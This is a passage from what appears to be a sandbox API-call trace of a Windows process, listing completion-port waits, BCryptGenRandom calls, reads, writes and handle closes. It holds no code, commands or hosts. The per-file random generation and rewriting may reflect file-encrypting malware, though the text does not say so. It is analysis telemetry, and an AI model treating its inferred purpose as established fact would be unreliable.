lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.169] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0164.169] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0164.170] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.170] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.170] free (_Block=0x3e305b8) [0164.170] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.170] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.171] free (_Block=0x1fa91d0) [0164.171] free (_Block=0x1fa2ed8) [0164.171] free (_Block=0x1fa90b8) [0164.171] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0164.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.172] CloseHandle (hObject=0x308) returned 1 [0164.173] free (_Block=0x1ff1e60) [0164.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.174] CloseHandle (hObject=0x2a8) returned 1 [0164.174] free (_Block=0x3d70450) [0164.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0164.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0164.305] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.305] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.305] free (_Block=0x3e305b8) [0164.305] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.305] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.306] free (_Block=0x1fa91d0) [0164.306] free (_Block=0x1fa2ed8) [0164.306] free (_Block=0x1fa90b8) [0164.306] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0164.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.311] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0164.311] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.336] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.364] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x948, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.364] CloseHandle (hObject=0x170) returned 1 [0164.365] free (_Block=0x1ff1e60) [0164.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0164.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0164.388] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.388] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.388] free (_Block=0x3e305b8) [0164.388] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.388] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.391] free (_Block=0x1fa91d0) [0164.391] free (_Block=0x1fa2ed8) [0164.391] free (_Block=0x1fa90b8) [0164.391] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0164.394] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0164.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0164.407] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.407] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.407] free (_Block=0x3e305b8) [0164.407] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.407] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.408] free (_Block=0x1fa91d0) [0164.408] free (_Block=0x1fa2ed8) [0164.408] free (_Block=0x1fa90b8) [0164.408] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.419] CloseHandle (hObject=0x2a8) returned 1 [0164.419] free (_Block=0x3df0008) [0164.419] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.484] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe64, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0164.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0165.095] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1fc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0165.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0165.160] CloseHandle (hObject=0x308) returned 1 [0165.161] free (_Block=0x1ff1e60) [0165.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0165.170] CloseHandle (hObject=0x2a4) returned 1 [0165.170] free (_Block=0x3d70450) [0165.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0165.178] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1c2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0165.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0165.202] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xff8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0165.216] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1434, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0165.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0165.234] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x55c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0165.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.548] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0166.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0166.555] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.555] free (_Block=0x3e305b8) [0166.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.555] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.556] free (_Block=0x1fa91d0) [0166.556] free (_Block=0x1fa2ed8) [0166.556] free (_Block=0x1fa90b8) [0166.556] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0166.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.560] CloseHandle (hObject=0x170) returned 1 [0166.560] free (_Block=0x3f70048) [0166.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0166.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0166.570] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.570] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.570] free (_Block=0x3e305b8) [0166.570] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.570] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.570] free (_Block=0x1fa91d0) [0166.570] free (_Block=0x1fa2ed8) [0166.570] free (_Block=0x1fa90b8) [0166.570] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0166.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0166.578] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.578] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.578] free (_Block=0x3e305b8) [0166.578] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.578] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.578] free (_Block=0x1fa91d0) [0166.578] free (_Block=0x1fa2ed8) [0166.578] free (_Block=0x1fa90b8) [0166.578] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0166.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.612] CloseHandle (hObject=0x2a4) returned 1 [0166.613] free (_Block=0x3df0008) [0166.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.616] CloseHandle (hObject=0x170) returned 1 [0166.617] free (_Block=0x3d70450) [0166.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.618] CloseHandle (hObject=0x2a8) returned 1 [0166.618] free (_Block=0x1ff1e60) [0166.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.619] CloseHandle (hObject=0x308) returned 1 [0166.619] free (_Block=0x3f70048) [0166.619] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0166.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0166.927] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.927] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.927] free (_Block=0x3e305b8) [0166.927] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.927] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.927] free (_Block=0x1fa91d0) [0166.927] free (_Block=0x1fa2ed8) [0166.927] free (_Block=0x1fa90b8) [0166.928] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0166.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.941] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0166.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0166.941] CloseHandle (hObject=0x3cc) returned 1 [0166.942] free (_Block=0x3e70008) [0167.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.167] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.168] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.168] free (_Block=0x3e305b8) [0167.168] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.168] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.168] free (_Block=0x1fa91d0) [0167.168] free (_Block=0x1fa2ed8) [0167.168] free (_Block=0x1fa90b8) [0167.168] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.169] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.181] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1138, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.182] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.183] CloseHandle (hObject=0x3cc) returned 1 [0167.183] free 